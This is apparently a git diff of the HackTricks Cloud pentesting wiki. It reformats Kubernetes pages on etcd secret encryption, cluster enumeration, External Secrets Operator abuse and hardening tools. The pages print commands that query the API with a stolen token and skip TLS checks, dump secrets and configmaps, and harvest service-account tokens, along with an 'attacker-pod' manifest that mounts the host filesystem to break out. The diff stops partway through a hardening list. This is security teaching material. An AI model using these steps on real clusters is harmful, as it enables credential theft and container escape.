-{% code title="secretpod.yaml" %}
-```yaml
+```yaml:secretpod.yaml
 apiVersion: v1
 kind: Secret
 metadata:
@@ -433,33 +416,32 @@ metadata:
 name: secretpod
 spec:
 containers:
- - name: secretpod
- image: nginx
- env:
- - name: SECRET_USERNAME
- valueFrom:
- secretKeyRef:
- name: mysecret
- key: username
- - name: SECRET_PASSWORD
- valueFrom:
- secretKeyRef:
- name: mysecret
- key: password
- volumeMounts:
- - name: foo
- mountPath: "/etc/foo"
+ - name: secretpod
+ image: nginx
+ env:
+ - name: SECRET_USERNAME
+ valueFrom:
+ secretKeyRef:
+ name: mysecret
+ key: username
+ - name: SECRET_PASSWORD
+ valueFrom:
+ secretKeyRef:
+ name: mysecret
+ key: password
+ volumeMounts:
+ - name: foo
+ mountPath: "/etc/foo"
 restartPolicy: Never
 volumes:
- - name: foo
- secret:
- secretName: mysecret
- items:
- - key: username
- path: my-group/my-username
- mode: 0640
+ - name: foo
+ secret:
+ secretName: mysecret
+ items:
+ - key: username
+ path: my-group/my-username
+ mode: 0640
 ```
-{% endcode %}
 ```bash
 kubectl apply -f 
@@ -496,29 +478,27 @@ ETCDCTL_API=3 etcdctl --cert /etc/kubernetes/pki/apiserver-etcd-client.crt --key
By default all the secrets are **stored in plain** text inside etcd unless you apply an encryption layer. The following example is based on [https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/](https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/)
-{% code title="encryption.yaml" %}
-```yaml
+```yaml:encryption.yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources: - resources: - - secrets providers:
- - aescbc:
- keys:
- - name: key1
- secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY= #Any random key
- - identity: {}
+ - aescbc:
+ keys:
+ - name: key1
+ secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY= #Any random key
+ - identity: {}
```
-{% endcode %}
After that, you need to set the `--encryption-provider-config` flag on the `kube-apiserver` to point to the location of the created config file. You can modify `/etc/kubernetes/manifest/kube-apiserver.yaml` and add the following lines:
```yaml
- containers:
+containers:
- command:
- - kube-apiserver
- - --encriyption-provider-config=/etc/kubernetes/etcd/
+ - kube-apiserver
+ - --encriyption-provider-config=/etc/kubernetes/etcd/
```
Scroll down in the volumeMounts:
@@ -547,12 +527,14 @@ Data is encrypted when written to etcd. After restarting your `kube-apiserver`,
```
kubectl create secret generic secret1 -n default --from-literal=mykey=mydata
```
+
2. Using the etcdctl commandline, read that secret out of etcd: `ETCDCTL_API=3 etcdctl get /registry/secrets/default/secret1 [...] | hexdump -C` where `[...]` must be the additional arguments for connecting to the etcd server.
-3. Verify the stored secret is prefixed with `k8s:enc:aescbc:v1:` which indicates the `aescbc` provider has encrypted the resulting data.
+
+3. Verify the stored secret is prefixed with `k8s:enc:aescbc:v1:` which indicates the `aescbc` provider has encrypted the resulting data.
4. Verify the secret is correctly decrypted when retrieved via the API:
```
@@ -569,28 +551,19 @@ kubectl get secrets --all-namespaces -o json | kubectl replace -f -
**Final tips:**
-* Try not to keep secrets in the FS, get them from other places.
-* Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets.
-* [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
-* [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes\_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm)
+- Try not to keep secrets in the FS, get them from other places.
+- Check out [https://www.vaultproject.io/](https://www.vaultproject.io) for add more protection to your secrets.
+- [https://kubernetes.io/docs/concepts/configuration/secret/#risks](https://kubernetes.io/docs/concepts/configuration/secret/#risks)
+- [https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm](https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm)
## References
-{% embed url="https://sickrov.github.io/" %}
+{{#ref}}
+https://sickrov.github.io/
+{{#endref}}
-{% embed url="https://www.youtube.com/watch?v=X48VuDVv0do" %}
+{{#ref}}
+https://www.youtube.com/watch?v=X48VuDVv0do
+{{#endref}}
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
similarity index 70%
rename from pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
index 358bdee06..10490838c 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-enumeration.md
@@ -1,19 +1,6 @@
# Kubernetes Enumeration
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
## Kubernetes Tokens
@@ -36,15 +23,15 @@ Every service account has a secret related to it and this secret contains a bear
Usually **one** of the directories:
-* `/run/secrets/kubernetes.io/serviceaccount`
-* `/var/run/secrets/kubernetes.io/serviceaccount`
-* `/secrets/kubernetes.io/serviceaccount`
+- `/run/secrets/kubernetes.io/serviceaccount`
+- `/var/run/secrets/kubernetes.io/serviceaccount`
+- `/secrets/kubernetes.io/serviceaccount`
contain the files:
-* **ca.crt**: It's the ca certificate to check kubernetes communications
-* **namespace**: It indicates the current namespace
-* **token**: It contains the **service token** of the current pod.
+- **ca.crt**: It's the ca certificate to check kubernetes communications
+- **namespace**: It indicates the current namespace
+- **token**: It contains the **service token** of the current pod.
Now that you have the token, you can find the API server inside the environment variable **`KUBECONFIG`**. For more info run `(env | set) | grep -i "kuber|kube`**`"`**
@@ -52,11 +39,11 @@ The service account token is being signed by the key residing in the file **sa.k
Default location on **Kubernetes**:
-* /etc/kubernetes/pki
+- /etc/kubernetes/pki
Default location on **Minikube**:
-* /var/lib/localkube/certs
+- /var/lib/localkube/certs
### Hot Pods
@@ -68,16 +55,16 @@ If you don't know what is **RBAC**, **read this section**.
## GUI Applications
-* **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Write `:namespace` and select all to then search resources in all the namespaces.
-* **k8slens**: It offers some free trial days: [https://k8slens.dev/](https://k8slens.dev/)
+- **k9s**: A GUI that enumerates a kubernetes cluster from the terminal. Check the commands in[https://k9scli.io/topics/commands/](https://k9scli.io/topics/commands/). Write `:namespace` and select all to then search resources in all the namespaces.
+- **k8slens**: It offers some free trial days: [https://k8slens.dev/](https://k8slens.dev/)
## Enumeration CheatSheet
In order to enumerate a K8s environment you need a couple of this:
-* A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token.
-* The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file.
-* **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this.
+- A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token.
+- The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file.
+- **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this.
With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host.
@@ -112,9 +99,8 @@ GET /apis/apps/v1/watch/deployments [DEPRECATED]
They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created).
-{% hint style="danger" %}
-The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
-{% endhint %}
+> [!CAUTION]
+> The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get`
### Using curl
@@ -130,9 +116,8 @@ alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# if kurl is still got cert Error, using -k option to solve this.
```
-{% hint style="warning" %}
-By default the pod can **access** the **kube-api server** in the domain name **`kubernetes.default.svc`** and you can see the kube network in **`/etc/resolv.config`** as here you will find the address of the kubernetes DNS server (the ".1" of the same range is the kube-api endpoint).
-{% endhint %}
+> [!WARNING]
+> By default the pod can **access** the **kube-api server** in the domain name **`kubernetes.default.svc`** and you can see the kube network in **`/etc/resolv.config`** as here you will find the address of the kubernetes DNS server (the ".1" of the same range is the kube-api endpoint).
### Using kubectl
@@ -140,11 +125,9 @@ Having the token and the address of the API server you use kubectl or curl to ac
By default, The APISERVER is communicating with `https://` schema
-{% code overflow="wrap" %}
```bash
alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true [--all-namespaces]' # Use --all-namespaces to always search in all namespaces
```
-{% endcode %}
> if no `https://` in url, you may get Error Like Bad Request.
@@ -165,8 +148,9 @@ kubectl get namespace --insecure-skip-tls-verify=true
### Current Configuration
-{% tabs %}
-{% tab title="Kubectl" %}
+{{#tabs }}
+{{#tab name="Kubectl" }}
+
```bash
kubectl config get-users
kubectl config get-contexts
@@ -176,8 +160,9 @@ kubectl config current-context
# Change namespace
kubectl config set-context --current --namespace=
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
If you managed to steal some users credentials you can **configure them locally** using something like:
@@ -196,19 +181,22 @@ kubectl config set-credentials USER_NAME \
With this info you will know all the services you can list
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get Current Privileges
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileves in custnamespace
@@ -216,86 +204,101 @@ k auth can-i --list -n custnamespace #Get privileves in custnamespace
# Get service account permissions
k auth can-i --list --as=system:serviceaccount:: -n
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -i -s -k -X $'POST' \ -H $'Content-Type: application/json' \ --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \ "https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
Another way to check your privileges is using the tool: [**https://github.com/corneliusweig/rakkess**](https://github.com/corneliusweig/rakkess)\*\*\*\*
You can learn more about **Kubernetes RBAC** in:
-{% content-ref url="kubernetes-role-based-access-control-rbac.md" %}
-[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md)
-{% endcontent-ref %}
+{{#ref}}
+kubernetes-role-based-access-control-rbac.md
+{{#endref}}
**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges:
-{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %}
-[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
-{% endcontent-ref %}
+{{#ref}}
+abusing-roles-clusterroles-in-kubernetes/
+{{#endref}}
### Get Others roles
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get roles
k get clusterroles
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500"
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get namespaces
Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get namespaces
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -k -v https://$APISERVER/api/v1/namespaces/
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get secrets
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get secrets -o yaml
k get secrets -o yaml -n custnamespace
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/
kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
If you can read secrets you can use the following lines to get the privileges related to each to token:
@@ -307,190 +310,230 @@ for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f
As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get serviceaccounts
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get Deployments
The deployments specify the **components** that need to be **run**.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get deployments
k get deployments -n custnamespace
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -v https://$APISERVER/api/v1/namespaces//deployments/
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get Pods
The Pods are the actual **containers** that will **run**.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get pods
k get pods -n custnamespace
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -v https://$APISERVER/api/v1/namespaces//pods/
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get Services
Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get services
k get services -n custnamespace
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -v https://$APISERVER/api/v1/namespaces/default/services/
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get nodes
Get all the **nodes configured inside the cluster**.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get nodes
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -v https://$APISERVER/api/v1/nodes/
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get DaemonSets
**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get daemonsets
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get cronjob
Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get cronjobs
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces//cronjobs
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get configMap
configMap always contains a lot of information and configfile that provide to apps which run in the kubernetes. Usually You can find a lot of password, secrets, tokens which used to connecting and validating to other internal/external service.
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get configmaps # -n namespace
```
-{% endtab %}
-{% tab title="API" %}
+{{#endtab }}
+
+{{#tab name="API" }}
+
```bash
-kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
+kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get Network Policies / Cilium Network Policies
-{% tabs %}
-{% tab title="First Tab" %}
+{{#tabs }}
+{{#tab name="First Tab" }}
+
```bash
k get networkpolicies
k get CiliumNetworkPolicies
k get CiliumClusterwideNetworkPolicies
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Get Everything / All
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get all
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### **Get all resources managed by helm**
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k get all --all-namespaces -l='app.kubernetes.io/managed-by=Helm'
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### **Get Pods consumptions**
-{% tabs %}
-{% tab title="kubectl" %}
+{{#tabs }}
+{{#tab name="kubectl" }}
+
```bash
k top pod --all-namespaces
```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
### Escaping from the pod
@@ -518,22 +561,22 @@ metadata:
namespace: default
spec:
volumes:
- - name: host-fs
- hostPath:
- path: /
+ - name: host-fs
+ hostPath:
+ path: /
containers:
- - image: ubuntu
- imagePullPolicy: Always
- name: attacker-pod
- command: ["/bin/sh", "-c", "sleep infinity"]
- volumeMounts:
- - name: host-fs
- mountPath: /root
+ - image: ubuntu
+ imagePullPolicy: Always
+ name: attacker-pod
+ command: ["/bin/sh", "-c", "sleep infinity"]
+ volumeMounts:
+ - name: host-fs
+ mountPath: /root
restartPolicy: Never
# nodeName and nodeSelector enable one of them when you need to create pod on the specific node
#nodeName: master
#nodeSelector:
- # kubernetes.io/hostname: master
+ # kubernetes.io/hostname: master
# or using
# node-role.kubernetes.io/master: ""
```
@@ -562,19 +605,8 @@ Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Pa
## References
-{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %}
+{{#ref}}
+https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3
+{{#endref}}
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
similarity index 83%
rename from pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
index 446545efb..321b2d32d 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md
@@ -32,8 +32,6 @@ kubectl get externalsecret -A | grep mystore
_This resource is namespace scoped so unless you already know which namespace to look for, add the -A option to look across all namespaces._
-
-
You should get a list of defined externalsecret. Let's assume you found an externalsecret object called _**mysecret**_ defined and used by namespace _**mynamespace**_. Gather a bit more information about what kind of secret it holds.
```sh
@@ -63,9 +61,9 @@ spec:
So far we got:
-* Name a ClusterSecretStore
-* Name of an ExternalSecret
-* Name of the secret
+- Name a ClusterSecretStore
+- Name of an ExternalSecret
+- Name of the secret
Now that we have everything we need, you can create an ExternalSecret (and eventually patch/create a new Namespace to comply with prerequisites needed to get your new secret synced ):
@@ -76,11 +74,11 @@ metadata:
namespace: evilnamespace
spec:
data:
- - remoteRef:
- conversionStrategy: Default
- decodingStrategy: None
- key: SECRET_KEY
- secretKey: SOME_PASSWORD
+ - remoteRef:
+ conversionStrategy: Default
+ decodingStrategy: None
+ key: SECRET_KEY
+ secretKey: SOME_PASSWORD
refreshInterval: 30s
secretStoreRef:
kind: ClusterSecretStore
@@ -92,15 +90,15 @@ spec:
```
```yaml
- kind: Namespace
- metadata:
- annotations:
- required_annotation: value
- other_required_annotation: other_value
- labels:
- required_label: somevalue
- other_required_label: someothervalue
- name: evilnamespace
+kind: Namespace
+metadata:
+ annotations:
+ required_annotation: value
+ other_required_annotation: other_value
+ labels:
+ required_label: somevalue
+ other_required_label: someothervalue
+ name: evilnamespace
```
After a few mins, if sync conditions were met, you should be able to view the leaked secret inside your namespace
@@ -109,10 +107,12 @@ After a few mins, if sync conditions were met, you should be able to view the le
kubectl get secret leaked_secret -o yaml
```
-
-
## References
-{% embed url="https://external-secrets.io/latest/" %}
+{{#ref}}
+https://external-secrets.io/latest/
+{{#endref}}
-{% embed url="https://github.com/external-secrets/external-secrets" %}
+{{#ref}}
+https://github.com/external-secrets/external-secrets
+{{#endref}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
similarity index 66%
rename from pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
rename to src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
index 87d58ffac..52528aaee 100644
--- a/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md
@@ -1,19 +1,6 @@
# Kubernetes Hardening
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
## Tools to analyse a cluster
@@ -30,10 +17,10 @@ kubescape scan --verbose
The tool [**kube-bench**](https://github.com/aquasecurity/kube-bench) is a tool that checks whether Kubernetes is deployed securely by running the checks documented in the [**CIS Kubernetes Benchmark**](https://www.cisecurity.org/benchmark/kubernetes/).\
You can choose to:
-* run kube-bench from inside a container (sharing PID namespace with the host)
-* run a container that installs kube-bench on the host, and then run kube-bench directly on the host
-* install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases),
-* compile it from source.
+- run kube-bench from inside a container (sharing PID namespace with the host)
+- run a container that installs kube-bench on the host, and then run kube-bench directly on the host
+- install the latest binaries from the [Releases page](https://github.com/aquasecurity/kube-bench/releases),
+- compile it from source.
### [**Kubeaudit**](https://github.com/Shopify/kubeaudit)
@@ -67,15 +54,15 @@ kube-hunter --remote some.node.com
[**Mkat**](https://github.com/DataDog/managed-kubernetes-auditing-toolkit) is a tool built to test other type of high risk checks compared with the other tools. It mainly have 3 different modes:
-* **`find-role-relationships`**: Which will find which AWS roles are running in which pods
-* **`find-secrets`**: Which tries to identify secrets in K8s resources such as Pods, ConfigMaps, and Secrets.
-* **`test-imds-access`**: Which will try to run pods and try to access the metadata v1 and v2. WARNING: This will run a pod in the cluster, be very careful because maybe you don't want to do this!
+- **`find-role-relationships`**: Which will find which AWS roles are running in which pods
+- **`find-secrets`**: Which tries to identify secrets in K8s resources such as Pods, ConfigMaps, and Secrets.
+- **`test-imds-access`**: Which will try to run pods and try to access the metadata v1 and v2. WARNING: This will run a pod in the cluster, be very careful because maybe you don't want to do this!
## **Audit IaC Code**
### [**Popeye**](https://github.com/derailed/popeye)
-[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**. It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive \_over\_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.
+[**Popeye**](https://github.com/derailed/popeye) is a utility that scans live Kubernetes cluster and **reports potential issues with deployed resources and configurations**.
It sanitizes your cluster based on what's deployed and not what's sitting on disk. By scanning your cluster, it detects misconfigurations and helps you to ensure that best practices are in place, thus preventing future headaches. It aims at reducing the cognitive \_over_load one faces when operating a Kubernetes cluster in the wild. Furthermore, if your cluster employs a metric-server, it reports potential resources over/under allocations and attempts to warn you should your cluster run out of capacity.
### [**KICS**](https://github.com/Checkmarx/kics)
@@ -106,9 +93,9 @@ To install:
You can configure the **security context of the Pods** (with _PodSecurityContext_) and of the **containers** that are going to be run (with _SecurityContext_). For more information read:
-{% content-ref url="kubernetes-securitycontext-s.md" %}
-[kubernetes-securitycontext-s.md](kubernetes-securitycontext-s.md)
-{% endcontent-ref %}
+{{#ref}}
+kubernetes-securitycontext-s.md
+{{#endref}}
### Kubernetes API Hardening
@@ -120,17 +107,17 @@ User or K8s ServiceAccount –> Authentication –> Authorization –> Admission
**Tips**:
-* Close ports.
-* Avoid Anonymous access.
-* NodeRestriction; No access from specific nodes to the API.
- * [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
- * Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
- * And also, allows kubelets to add/remove/update these labels and label prefixes.
-* Ensure with labels the secure workload isolation.
-* Avoid specific pods from API access.
-* Avoid ApiServer exposure to the internet.
-* Avoid unauthorized access RBAC.
-* ApiServer port with firewall and IP whitelisting.
+- Close ports.
+- Avoid Anonymous access.
